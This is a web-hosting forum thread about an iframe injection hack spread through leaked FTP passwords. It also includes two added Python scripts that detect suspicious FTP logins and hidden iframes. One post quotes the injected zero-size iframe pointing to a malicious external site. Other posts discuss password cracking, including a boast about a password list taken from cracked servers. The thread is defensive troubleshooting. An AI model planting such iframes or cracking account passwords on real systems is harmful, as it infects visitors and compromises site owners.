  1. #16
    Member (Lithuania; joined Nov 2006; 122 posts)

    I have an account at Hostgator and clearly know that the iframe issue was IN SEPTEMBER.

    Now getting back to the topic... It is not difficult to steal FTP logins as they are sent unencrypted. I can say very few use secure FTP.
    Gytis Repecka aka Kelmas
    NFS Tuning / AutoNews.lt webmaster, IT journalist

  2. #17
    Member (UK, Luton; joined Sep 2003; 197 posts)

    I don’t think the passwords are being captured by anyone listening on the server or between the server + user or even on the users system. It’s more likely they gained the passwd file off the server and ran something like jack the ripper to crack the passwords.

    We've seen the same IP on all of our servers that are affected connect to the server with many different usernames and login successfully. We're currently investigating if it’s feasible to simply download the passwd file off the server with some PHP coding and then attempt to crack the passwords.
    Regards,
    James Smith
    UH Hosting Ltd

  3. #18
    Super Moderator chirpy (account confirmed by cPanel staff to represent a vendor; joined Jun 2002; location: "Go on, have a guess"; 13,495 posts)

    On most modern Linux distros passwords are not stored in /etc/passwd, they're in /etc/shadow, and to get at those you nearly always need a root exploit (unless your permissions on that file are FUBAR'd). I'd guess at a simple password guesser/weak password.

    Usually to capture passwords in the clear requires, again, either a root exploit on the server itself, or a packet sniffer on the same subnet as you on a separate server that has been root compromised. It's unlikely, but possible.
    Jonathan Michaelson

    Need your cPanel servers secured and tuned?
    cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
    Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
    http://www.configserver.com

  4. #19
    Member (UK, Luton; joined Sep 2003; 197 posts)

    On one server with 850 accounts, we believe 63 have been accessed and affected by this code change.

    So yes, it could be that all the users were using relatively weak passwords and they were guessed, along with the usernames ... or someone has been able to gain other sensitive information, as you suggest. But there is nothing sniffing on our network or the individual servers to do this. So it means cPanel has a problem or something else gathered information before cPanel patched it.
    Regards,
    James Smith
    UH Hosting Ltd

  5. #20
    Member (joined Sep 2003; 165 posts)

    Get John the Ripper to test your users' passwords.
    Last edited by carluk; 12-06-2006 at 04:41 AM. Reason: Wrong name.
    search is your friend!
    cPanel Specialist Certification::Technical

  6. #21
    cPanel Partner NOC (joined Dec 2004; 392 posts)

    lol.. u mean John-the-ripper..

    on one of my other cracked servers I got a nice 44 meg password list.. boy does it crack em good
    UK Managed Hosting
    UK Linux Support
    The information given above is intended to be advice only.

  7. #22
    Member (joined Sep 2003; 165 posts)

    Good catch. I should probably just use JTR. I should have included the link: http://www.openwall.com/john/ also worth reading http://en.wikipedia.org/wiki/John_the_Ripper
    search is your friend!
    cPanel Specialist Certification::Technical

  8. #23
    Member shanit (joined Dec 2005; 46 posts)

    Quote Originally Posted by JamesSmith:
    Some of our servers are suffering the same fate, despite everything being up to date. Some web sites on some servers have the following added to their index.php pages:

    Code:
    <iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>
    I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!


    Exactly. I pay for server management; I don't need them to do it. If it's an insecurity then it's something they should automatically help with, especially since it's a paid-for script........

    PS I have had to also pay additional fees on top of my management because of these problems. I'm not a happy camper.
    Last edited by shanit; 05-09-2007 at 08:18 PM.

  9. #24
    Member (joined Mar 2003; 222 posts; cPanel/Enkompass access level: Root Administrator)

    This happened to several accounts on one of my servers. I don't see any root access or any such problem. Someone from IP 81.95.144.202 logged in to the FTP of several web sites, downloaded the index file, added his code and re-uploaded it.
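    The access pattern described in #17 and #24 (one remote address logging into many different FTP accounts on the same server and re-uploading index files) is easy to pull out of FTP logs. The following is an added example, not code from the thread or from any poster: it correlates login and upload events per source IP and flags any IP that has authenticated to several distinct accounts. The log lines are constructed and modeled on pure-ftpd's syslog output (the first IP is the one quoted in #24, the second is a documentation-range address); the threshold, regexes and function names are my assumptions, so adjust the patterns to whatever your FTP daemon actually writes.

```python
import re
from collections import defaultdict

# Constructed sample log, modeled on pure-ftpd's syslog output (not taken from the thread).
# 81.95.144.202 is the address reported in post #24; 203.0.113.7 is a documentation-range IP.
SAMPLE_LOG = """\
Dec  6 03:10:01 srv1 pure-ftpd: (?@81.95.144.202) [INFO] alice is now logged in
Dec  6 03:10:04 srv1 pure-ftpd: (alice@81.95.144.202) [NOTICE] /home/alice//public_html/index.php downloaded  (4000 bytes, 40.1KB/sec)
Dec  6 03:10:06 srv1 pure-ftpd: (alice@81.95.144.202) [NOTICE] /home/alice//public_html/index.php uploaded  (4120 bytes, 38.1KB/sec)
Dec  6 03:10:09 srv1 pure-ftpd: (?@81.95.144.202) [INFO] bob is now logged in
Dec  6 03:10:12 srv1 pure-ftpd: (bob@81.95.144.202) [NOTICE] /home/bob//public_html/index.html uploaded  (2233 bytes, 20.0KB/sec)
Dec  6 03:10:20 srv1 pure-ftpd: (?@81.95.144.202) [INFO] carol is now logged in
Dec  6 03:10:25 srv1 pure-ftpd: (carol@81.95.144.202) [NOTICE] /home/carol//public_html/index.php uploaded  (5010 bytes, 44.2KB/sec)
Dec  6 08:15:30 srv1 pure-ftpd: (?@203.0.113.7) [INFO] dave is now logged in
Dec  6 08:16:02 srv1 pure-ftpd: (dave@203.0.113.7) [NOTICE] /home/dave//public_html/photos/cat.jpg uploaded  (90210 bytes, 310.0KB/sec)
"""

# Assumed line shapes; verify against your own daemon's log before relying on them.
LOGIN_RE = re.compile(r"\(\?@(?P<ip>[\d.]+)\) \[INFO\] (?P<user>\S+) is now logged in")
UPLOAD_RE = re.compile(r"\((?P<user>[^@()]+)@(?P<ip>[\d.]+)\) \[NOTICE\] (?P<path>\S+) uploaded")
INDEX_RE = re.compile(r"/index\.(?:php|html?)$", re.I)


def analyse(log_text, min_accounts=3):
    """Return {ip: {"accounts": [...], "index_uploads": [(user, path), ...]}}
    for every source IP that logged into at least min_accounts distinct accounts.
    A single customer rarely owns that many accounts, so the hit list is short."""
    logins = defaultdict(set)          # ip -> usernames that logged in from it
    index_uploads = defaultdict(list)  # ip -> index files (re)uploaded from it
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            logins[m["ip"]].add(m["user"])
            continue
        m = UPLOAD_RE.search(line)
        if m and INDEX_RE.search(m["path"]):
            index_uploads[m["ip"]].append((m["user"], m["path"]))
    return {
        ip: {"accounts": sorted(users), "index_uploads": index_uploads.get(ip, [])}
        for ip, users in logins.items()
        if len(users) >= min_accounts
    }


if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG).items():
        print(f"{ip}: logged into {len(info['accounts'])} accounts: {', '.join(info['accounts'])}")
        for user, path in info["index_uploads"]:
            print(f"    index file uploaded as {user}: {path}")
```

    Run it over the real log (`analyse(open('/var/log/messages').read())` or whatever file your daemon writes to) and every flagged IP gives you the list of accounts whose passwords must be assumed leaked, which is the list #26 says you need to reset.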

  10. #25
    Technical Product Specialist cPanelDavidG (Houston, TX; joined Nov 2006; 10,718 posts; cPanel/Enkompass access level: Root Administrator)

    There's an ongoing discussion about iFrame hacks at: http://forums.cpanel.net/showthread....ghlight=iFrame

  11. #26
    Member apscinsspl (joined Mar 2008; 112 posts)

    Solution to IFRAME and JAVA SCRIPT HACK

    How does this hacking take place:

    This hacking does not take place through any PHP application vulnerability, nor any kernel bug, nor Apache bug, nor cPanel or Plesk bug. The affected files belong to those accounts whose FTP logins are leaked.

    Believe me, I have been researching this iframe and JavaScript hack for the last 10 months.

    ONLY THOSE ACCOUNTS ARE HACKED WHOSE FTP LOGIN DETAILS ARE LEAKED AND ARE WITH THE HACKER !!!!

    How it's done
    This is a sophisticated operation, and the infection cycle is involved, but basically, the hacker(s) are setting up innocent-looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, Firefox and Opera). The visitor is unaware that they may have a keylogger that sends the person's passwords etc. to the hacker(s), and moves on. If the innocent visitor has an FTP or root password for any internet sites, the hackers use a program that goes to the person's site(s) and instantly adds the hidden iframe to every index-type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the FTP or root passwords to log in. And since they have at least your account's FTP password, whatever permissions your folders and files are set to make no difference.

    After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers' infection site, where the person's computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked so that the number of hacked sites will grow (as they have, starting in Italy) into the tens of thousands... Please don't think you can depend solely on your antivirus software to protect your computer. It more than likely won't help you. For $1000, the Russian hacking bulletin boards are offering Mpack with 1 year of support and a GUARANTEE that virus programs will not catch the keyloggers. SO, keep your virus program updated, but don't depend on it completely!

    This way this hack is spreading fast from one computer to another, broadcasting the passwords to hackers. During my research into this, I even found some of the password files collected by the hack on some of the hacked servers, where they pass this password file to their tool to add the code. In some cases Google bots pick up these files and you can even find the login details of FTP accounts and server root logins in Google.

    ===============================================
    Solution:
    ===============================================


    For Server Administrators:

    If you are having this problem server wide then the only possibility is your root password is used for this. Just change the password and this HACK WILL STOP

    For an individual person owning just a domain and not a server:

    If you are facing this problem and your administrator says it's only your account, just change the FTP password and it will stop.

    You must have removed the code many times and it comes again. Why???
    Because you don't change the FTP password. So change that first.

    Just changing the password is not a complete solution but is the first step.
    What's next: your password is leaked, which means your computer is sending out the passwords, so I would suggest you do a clean format first and then install any antivirus or anti-spyware software which you think could block it. But the best solution is to clean format the computer.

    Just do the two things:

    1) Change the FTP or root password of the server
    2) Clean format the PC

    and take care in future that you don't visit any of the virus links made by this hack.
    Also, to keep your password secure I would suggest you use password manager software like:

    http://keepass.info/

    This is FREE open-source software.

    I can assure you this is a confirmed solution and will definitely help you all.
    Please try it, and once you have confirmed it, please spread this message in as many forums as you can so that others also come to know how to stop it.

    Comments can be sent to: tech.cpanel@gmail.com
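    Since #26 says the injected code keeps coming back until the leaked password is changed, an administrator also needs a quick way to find which index pages on a server currently carry the payload. The following is an added example, not code from the thread or from any poster: it walks a web root, reads only index pages (the files #26 says get modified) and flags iframes that are hidden by zero dimensions or by CSS, reporting the `src` each one points at. The sample pages are constructed; the iframe tag is the one quoted from JamesSmith in #23; the temporary-directory helper, the hidden-iframe heuristics and the function names are my assumptions.

```python
import os
import re
import tempfile

# Heuristics (assumed): an iframe sized 0x0 or hidden with CSS has no legitimate reason
# to be in a customer's index page; a visible, normally sized iframe is left alone.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
ZERO_DIM = re.compile(r"""\b(?:width|height)\s*=\s*["']?0+(?:px)?["']?(?=[\s/>])""", re.I)
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
INDEX_FILE = re.compile(r"^index\.(?:php|html?)$", re.I)

# Constructed sample pages; the iframe tag is the one quoted in post #23.
SAMPLE_INJECTED = (
    "<html><body><h1>Welcome</h1>\n"
    '<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>\n'
    "</body></html>\n"
)
SAMPLE_CLEAN = (
    '<html><body><iframe src="https://example.com/embed" width="600" height="400">'
    "</iframe></body></html>\n"
)


def find_hidden_iframes(html):
    """Return [(src, reason), ...] for every iframe in html that is hidden from the visitor."""
    hits = []
    for tag in IFRAME_TAG.findall(html):
        reasons = []
        if ZERO_DIM.search(tag):
            reasons.append("zero-size")
        if HIDDEN_CSS.search(tag):
            reasons.append("css-hidden")
        if reasons:
            m = SRC_ATTR.search(tag)
            hits.append((m.group(1) if m else "", ",".join(reasons)))
    return hits


def scan_tree(root):
    """Walk root, check every index.php/index.html/index.htm, and return
    {relative_path: [(src, reason), ...]} for the pages that carry a hidden iframe."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not INDEX_FILE.match(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


def build_sample_tree():
    """Create a throwaway directory laid out like /home/<user>/public_html (constructed)."""
    root = tempfile.mkdtemp(prefix="iframe-scan-")
    for sub, content in (("alice/public_html", SAMPLE_INJECTED), ("bob/public_html", SAMPLE_CLEAN)):
        d = os.path.join(root, sub)
        os.makedirs(d)
        with open(os.path.join(d, "index.php"), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_tree()).items():
        for src, reason in hits:
            print(f"{rel}: hidden iframe ({reason}) -> {src}")
```

    Point `scan_tree` at `/home` on a real cPanel box and the result is the list of accounts to clean and, more importantly, the list of accounts whose FTP passwords to reset; running it again after the reset shows whether the re-infection has actually stopped.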

  12. #27
    Registered User (joined Jun 2008; 1 post)

    @ apscinsspl

    Thanks for the solution, I am going to give it a try and hope it works.
